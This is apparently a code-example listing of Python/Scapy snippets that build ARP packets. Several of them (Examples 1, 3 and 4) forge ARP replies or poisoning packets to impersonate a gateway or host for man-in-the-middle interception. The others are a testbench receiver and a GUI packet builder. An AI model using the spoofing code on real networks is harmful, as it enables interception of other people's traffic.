Exemple #1
0
def sendARP(args):
    a = ARP()
    a.pdst = args.dip
    a.psrc = args.sip
    a.hwsrc = args.smac
    a.op = 'who-has '

    try:
        while 1:
            send(a, 1)
            time.sleep(5)
    except KeyboardInterrupt:
        pass
def arpPoisoning(src_mac, src_ip, tgt_ip, tgt_mac):
    """
		Not used ... 1st poison the network into thinking you are the victim as well as the reflector
	"""
    #Here Ethernet layer will need to be changed too
    arp = ARP()
    arp.hwsrc = src_mac
    arp.psrc = src_ip
    arp.hwdst = tgt_mac
    arp.pdst = tgt_ip
    arp.op = ARP.who_has
    #sendp(arp, iface=INTERFACE)
    send(arp, iface=INTERFACE)
Exemple #3
0
def spoof(target_ip, host_ip, iface=None, verbose=True):
    target_mac = get_mac(target_ip)
    # op = {1:'who-has', 2:'is-at'}
    arp_pkt = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op=2)

    self_mac = arp_pkt.hwsrc
    if iface:
        self_mac = sc.get_if_hwaddr(iface)
        arp_pkt.hwsrc = self_mac

    send(arp_pkt, verbose=0)
    if verbose:
        print('[+] sent to {} : {} is-at {}'.format(target_ip, host_ip, self_mac))
Exemple #4
0
    def spoof_packets(self):
        print("[*] Spoofing packets...")

        gateway_packet = ARP()
        gateway_packet.op = 2
        gateway_packet.psrc = self.gateway_ip
        gateway_packet.hwsrc = self.gateway_mac
        gateway_packet.pdst = self.target_ip
        gateway_packet.hwdst = self.target_mac

        print("[*] Created ARP packet -- {{src={0}, dst={1}}}".format(
            self.gateway_ip, self.target_ip))

        target_packet = ARP()
        target_packet.op = 2
        target_packet.psrc = self.target_ip
        target_packet.hwsrc = self.target_mac
        target_packet.pdst = self.gateway_ip
        target_packet.hwdst = self.gateway_mac

        print("[*] Created ARP packet -- {{src={0}, dst={1}}}".format(
            self.target_ip, self.gateway_ip))

        return gateway_packet, target_packet
Exemple #5
0
    async def recv(self):
        rx_frame = await self.sink.recv()

        eth = Ether()
        eth.dst = rx_frame.eth_dest_mac.integer.to_bytes(6, 'big')
        eth.src = rx_frame.eth_src_mac.integer.to_bytes(6, 'big')
        eth.type = rx_frame.eth_type.integer
        arp = ARP()
        arp.hwtype = rx_frame.arp_htype.integer
        arp.ptype = rx_frame.arp_ptype.integer
        arp.hwlen = rx_frame.arp_hlen.integer
        arp.plen = rx_frame.arp_plen.integer
        arp.op = rx_frame.arp_oper.integer
        arp.hwsrc = rx_frame.arp_sha.integer.to_bytes(6, 'big')
        arp.psrc = rx_frame.arp_spa.integer
        arp.hwdst = rx_frame.arp_tha.integer.to_bytes(6, 'big')
        arp.pdst = rx_frame.arp_tpa.integer
        rx_pkt = eth / arp

        return Ether(bytes(rx_pkt))
Exemple #6
0
 def getARPPacket(self):
     """
     构造ARP数据包
     :return:
     """
     try:
         arp_packet = ARP()
         arp_packet.hwtype = int(self.entries[0].get())
         arp_packet.ptype = int(self.entries[1].get())
         arp_packet.op = int(self.entries[2].get())
         arp_packet.hwlen = int(self.entries[3].get())
         arp_packet.plen = int(self.entries[4].get())
         arp_packet.hwdst = self.entries[5].get()
         arp_packet.psrc = self.entries[6].get()
         arp_packet.hwsrc = self.entries[7].get()
         arp_packet.pdst = self.entries[8].get()
         arp_packet.show()
         self.resultText.insert('end', arp_packet.summary() + '\n')
         self.resultText.insert('end', str(arp_packet) + '\n')
         return Ether() / arp_packet
     except Exception as e:
         print(e.with_traceback())
     finally:
         pass